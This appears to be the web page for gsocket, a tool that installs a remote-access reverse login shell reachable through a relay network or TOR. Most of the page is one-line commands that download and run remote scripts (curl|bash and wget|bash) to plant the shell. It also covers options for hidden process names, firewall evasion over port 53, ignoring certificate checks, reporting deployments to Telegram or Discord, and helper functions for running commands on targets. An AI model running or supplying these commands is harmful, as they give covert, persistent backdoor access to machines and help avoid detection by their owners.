Connect like there is no firewall. Securely.
Deploy a reverse login shell with a single command (fully automated) - and access the shell remotely - encrypted - and via TOR if you like.
This must be the quickest way to access a system – anonymous
Use either one of these three commands to install, uninstall, and access:
Install
bash -c "$(curl -fsSL https://gsocket.io/y)"
Uninstall
GS_UNDO=1 bash -c "$(curl -fsSL https://gsocket.io/y)"
Access
S="ExampleSecretChangeMe" bash -c "$(curl -fsSL https://gsocket.io/y)"
Install
bash -c "$(wget --no-verbose -O- https://gsocket.io/y)"
Uninstall
GS_UNDO=1 bash -c "$(wget --no-verbose -O- https://gsocket.io/y)"
Access
S="ExampleSecretChangeMe" bash -c "$(wget --no-verbose -O- https://gsocket.io/y)"
Windows user need to manually install the binary. Contact us if you like to write a powershell deploy script.
Deploy on a host
Log in to the host from your workstation
Ignore SSL / Certificate warnings
GS_NOCERTCHECK=1 bash -c "$(curl -fsSLk https://gsocket.io/y)"
Deploy with a predefined secret
X=ExampleSecretChangeMe bash -c "$(curl -fsSL https://gsocket.io/y)"
Deploy from self-extracting shell-script deploy-all.sh without fetching any packages and using good old plain HTTP
curl -fsSL http://nossl.segfault.net/deploy-all.sh -o deploy-all.sh && \
bash deploy-all.sh
# alternative if port 443 is firewalled:
GS_PORT=53 bash deploy-all.sh
Ignore SSL / Certificate warnings
GS_NOCERTCHECK=1 bash -c "$(wget --no-check-certificate -qO- https://gsocket.io/y)"
Deploy with a predefined secret
X=ExampleSecretChangeMe bash -c "$(wget --no-verbose -O- https://gsocket.io/y)"
Deploy from self-extracting shell-script deploy-all.sh without fetching any packages and using good old plain HTTP
wget --no-hsts http://nossl.segfault.net/deploy-all.sh && \
bash deploy-all.sh
# alternative if port 443 is firewalled:
GS_PORT=53 bash deploy-all.sh
Useful environment variables:
S= | Connect to a system (or use gs-netcat -s <secret> -il ). |
X= | Set a predefined secret for the installation (X like in inXstallation). |
GS_NOINST=1 | Only start but without installing (will not survive a reboot). |
GSOCKET_ARGS= | Use additonal arguments. Most often used to force TOR in combination with S=, e.g. GSOCKET_ARGS="-T" S=<secret> bash -c "$(curl -fsSLk https://gsocket.io/y) . |
GS_DSTDIR= | Set the installation directory. The default is to pick the most suitable automatically. Use find . -type d -writable . |
GS_URL_BASE= | Use URL for static binaries. An alternative base is https://github.com/hackerschoice/binary/raw/main/gsocket |
GS_OSARCH= | Force architecture. The default is to pick the most suitable automatically. |
GS_DEBUG=1 | Verbose output and other debug related settings. Often used together with GS_DEBUG=1 GS_NOSTART=1 GS_NOINST=1 bash -c "$(curl -fsSL https://gsocket.io/y)" . |
GS_HIDDEN_NAME= | Use a custom hidden process name. |
GS_HOST= | Use a specific GSRN server (or your own relay). Try GS_HOST=1.2.3.4 |
GS_PORT= | Use a specific GSRN port. Try any of 22,53,67,443,7350 |
GS_TG_TOKEN= | Telegram Bot Key for reporting successfull deployments. |
GS_TG_CHATID= | Telegram Chat ID. |
GS_DISCORD_KEY= | Report to Discord |
GS_WEBHOOK_KEY= | Report to webhook.site |
TMPDIR= | Use a custom temporary directory. Try TMPDIR=$(pwd) |
If all fails:
Download the static binary from https://github.com/hackerschoice/gsocket/releases/latest/. There also is an (unsupported) Windows binary or use qsocket.io.
# This will not survive reboot. Temporary access only.
killall gs; \
curl -fsSLk -ogs https://github.com/hackerschoice/gsocket/releases/latest/download/gs-netcat_linux-$(uname -m) \
&& chmod 755 gs \
&& S=$(./gs -g) \
&& GS_PORT=53 GSOCKET_ARGS="-liD -s $S" ./gs \
&& echo "Connect with: gs-netcat -s $S -i" \
&& rm -f gs
# This will not survive reboot. Temporary access only.
killall gs; \
wget --no-check-certificate -qOgs https://github.com/hackerschoice/gsocket/releases/latest/download/gs-netcat_linux-$(uname -m) \
&& chmod 755 gs \
&& S=$(./gs -g) \
&& GS_PORT=53 GSOCKET_ARGS="-liD -s $S" ./gs \
&& echo "Connect with: gs-netcat -s $S -i" \
&& rm -f gs
(Note: GS_PORT=53 is only needed if port 443 is firewalled).
This method logs each successful deployment. The 1-line command creates an ephemeral and public facing HTTPS tunnel (via Cloudflare) so that your server can be behind NAT/Firewall:
LOG=results.log bash -c "$(curl -fsSL https://gsocket.io/ys)"
# cut & paste this into your shell on your workstation or add to ~/.bashrc
gsexec() {
set +m
{ echo "$2; kill -9 \$\$; __START"; sleep infinity;}|{ gs-netcat -s "$1"|sed -un '/__START/,$p'|tail +2; kill 0;}
set -m
}
Then execute a remote command like this:
gsexec MySecretChangeMe "id; uname -a"
Remembering many secrets from many deployments is cumbersome. It is easier to remember just one MASTER-SEED and derive the SECRET from the target’s hostname. The following script generates a secure SECRET based on a single MASTER-SEED and the target’s hostname.
# cut & paste this into your shell on your workstation or add to ~/.bashrc
gssec() {
[[ -z $GS_SEED ]] && { echo >&2 "Please type: GS_SEED=MySuperStrongMasterSeed"; return 255; }
str="$(echo "${GS_SEED:?}$1" | sha512sum | base64 | tr -d -c a-z0-9)"
str="${str:0:22}"
[[ ! -t 1 ]] && { echo "${str}"; return; }
echo "DEPLOY: X=${str}"' bash -c "$(curl -fsSL https://gsocket.io/y)"'
echo "ACCESS: S=${str}"' bash -c "$(curl -fsSL https://gsocket.io/y)"'
echo "ACCESS: gs-netcat -s ${str} -i"
}
# Set a Master Seed:
GS_SEED="ThisIsMySecretMasterSeed"
# Connect to 'alice.com'
gs-netcat -i -s $(gssec alice.com)
-----------------------------------------------------------------------------
# or show the commands to deploy on/access to 'alice.com'
gssec alice.com
# Output from above's command:
DEPLOY: X=2m1zidi1zkkmxjjj0z0jlj bash -c "$(curl -fsSL https://gsocket.io/y)"
ACCESS: S=2m1zidi1zkkmxjjj0z0jlj bash -c "$(curl -fsSL https://gsocket.io/y)"
ACCESS: gs-netcat -s 2m1zidi1zkkmxjjj0z0jlj -i
Get Involved. We are looking for volunteers to work on the website and a logo and to discuss new ideas. Join us.